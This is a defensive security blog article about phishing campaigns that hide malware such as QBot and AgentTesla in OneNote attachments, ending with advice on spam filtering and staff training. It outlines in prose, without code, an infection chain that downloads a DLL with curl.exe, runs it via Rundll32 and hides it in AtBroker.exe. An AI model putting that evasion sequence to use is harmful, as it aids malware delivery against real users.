Light Dark
March 21, 2023 By Doug Bonderud 4 min read
Risk Management

There are plenty of phish in the digital sea, and attackers are constantly looking for new bait that helps them bypass security perimeters and land in user inboxes.

Their newest hook? OneNote documents. First noticed in December 2022, this phishing framework has seen success in fooling multiple antivirus (AV) tools by using .one file extensions, and January 2023 saw an attack uptick as compromises continued.

While this novel notes approach will eventually be phased out as phishing defenses catch up, current conditions make it worthwhile to understand how this attack works, what it means for organizations and what they can do to stay safe.

From many to .One — the impact of macro-economics

In July 2022, Microsoft disabled macros by default in all Office document types. Despite a temporary rollback in response to user concerns, auto-blocking of macros is now standard operating practice. While users can enable them after the fact, malicious actors can no longer rely on macros to make their phishing efforts easier.

To combat this cybersecurity change, attackers went looking for a new approach and found it in OneNote documents. For cyber criminals, the benefits of OneNote are two-fold. The first is novelty: Businesses aren’t expecting attacks in .one files. Next is efficacy: As noted by ZDNET, multiple AV tools did not flag OneNote attachments as malicious, even when they contained malware payloads.

How OneNote malware works

The first OneNote attacks were discovered in December 2022 as attackers experimented with new phishing methods. As of February 2023, more than 60 attacks were confirmed on companies in the manufacturing, industrial and education sectors.

Common payloads attached to malicious documents include AsyncRAT, AgentTesla, Doubleback and Redline. Malicious actors also created a mix of specific and general compromise campaigns. In the case of industrial and manufacturing firms, attachments appeared to be documents containing details about machine parts or specifications. Educational institutions were on the receiving end of more widespread campaigns that included fictitious invoices or offers of Christmas bonuses.

Despite the new file format, OneNote phishing attacks play out much like their more familiar counterparts. Victims must open the email message, open the attachment and then click through on malicious links. While OneNote does warn users about the risk of suspicious document links, this doesn’t always have the intended effect. Consider that 45% of all alerts are false positives and that one-third of IOT security staff ignore alerts if their queue is already full. Given that even security professionals don’t always investigate potential problems because they’re too busy or perceived threats may simply be common errors, it’s hardly surprising that front-line staff feel confident clicking through to OneNote documents despite system warnings.

Once inside a company’s network, malicious payloads delivered by OneNote documents can find, collect and exfiltrate sensitive data, including usernames, passwords and protected files.

Duck, duck, lose

Efforts are also underway to expand the impact of OneNote attacks by bundling documents with the QBot malware payload. Originally a banking trojan discovered in 2007, QBot — also called QakBot — has evolved into an initial access framework. As part of a phishing campaign, it takes on the task of gaining initial device access, in turn enabling attackers to load and execute additional malware payloads.

As noted by SC Magazine, a cyber crime group known as TA577 has leveraged QBot-based attacks to gain system access, then steal and sell collected data to other cyber criminals. Known as QakNote, this new attack approach has quickly gained ground. Since early February, attackers have pressed their advantage to hook as many phish as possible before the pond dries up.

In practice, QBot attacks start with an embedded HTML application (HTA) that retrieves QBot when users click on malicious links. Then, an HTA script uses the curl.exe application to download a DLL file that contains QBot. This file is placed in the C:\ProgramData folder and executed using Rundll32.exe. Finally, the payload injects itself into the Windows Assistive Technology file — AtBroker.exe — to conceal itself from security tools.

Foiling the phish

Recognizing OneNote issues is the first step in reducing risk. But what else can companies do to limit the chance of compromise?

Thankfully, the novel nature of the note attack doesn’t change the overall security strategy. First, companies need to implement robust spam filters to keep the bulk of potentially problematic emails out of user inboxes. This approach works well because it doesn’t just emphasize detecting the malicious nature of OneNote documents. Rather, it focuses on identifying messages as spam, which is often a more straightforward task.

Next is cybersecurity education which focuses on secure computing habits. While this includes reminders to heed security warnings, it’s also critical for companies to offer more proactive advice that helps staff spot phishing efforts more easily. As social engineering efforts become more in-depth, this education is shifting away from more generic recommendations such as seeking out grammar or spelling errors. Instead, it takes a more considered approach that focuses on questions. Common questions for staff include: Why am I receiving this email? Do I know the sender? Was I asking for these documents? What action are they asking me to take? It’s also worth running regular phishing exercises to see if staff can spot security risks before they click through.

Slow and steady

Lastly, enterprises need to prioritize the value of slowing down when it comes to improving security. This is because company culture often prioritizes speed. Staff want to meet deadlines and avoid setbacks on current projects, meaning that potential security threats may be sidelined in favor of keeping tasks on track. To address this, IT teams need to seek out C-suite support for policies that require staff to report potential problems and make it clear that this reporting takes priority over other tasks. It’s also worth implementing a system that allows staff to quickly flag emails for IT review.

Bottom line? Security teams need to take note and take action. The shift away from macro-based malware may have closed one digital door, but it opened a window for new phishing frameworks.

 |  |  |  |  |  |  | 
Doug Bonderud
Writer

More from Risk Management
January 28, 2025

4 trends in software supply chain security

4 min read - Some of the biggest and most infamous cyberattacks of the past decade were caused by a security breakdown in the software supply chain. SolarWinds was probably the most well-known, but it was not alone. Incidents against companies like Equifax and tools like MOVEit also wreaked havoc for organizations and customers whose sensitive information was compromised.Expect to see more software supply chain attacks moving forward. According to ReversingLabs' The State of Software Supply Chain Security 2024 study, attacks against the software…

January 24, 2025

How cyberattacks on grocery stores could threaten food security

4 min read - Grocery store shoppers at many chains recently ran into an unwelcome surprise: empty shelves and delayed prescriptions. In early November, Ahold Delhaize USA was the victim of a cyberattack that significantly disrupted operations at more than 2,000 stores, including Hannaford, Food Lion and Stop and Shop. Specific details of the nature of the attack have not yet been publicly released.Because the attack affected many digital systems, some stores were not able to accept credit/debit cards, while others had to shut…

January 23, 2025

Taking the fight to the enemy: Cyber persistence strategy gains momentum

4 min read - The nature of cyber warfare has evolved rapidly over the last decade, forcing the world’s governments and industries to reimagine their cybersecurity strategies. While deterrence and reactive defenses once dominated the conversation, the emergence of cyber persistence — actively hunting down threats before they materialize — has become the new frontier. This shift, spearheaded by the United States and rapidly adopted by its allies, highlights the realization that defense alone is no longer enough to secure cyberspace.The momentum behind this…

Topic updates

 Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today
© 2025 IBM Contact Privacy Terms of use Accessibility Cookie Preferences
Sponsored by si-icon-eightbarfeature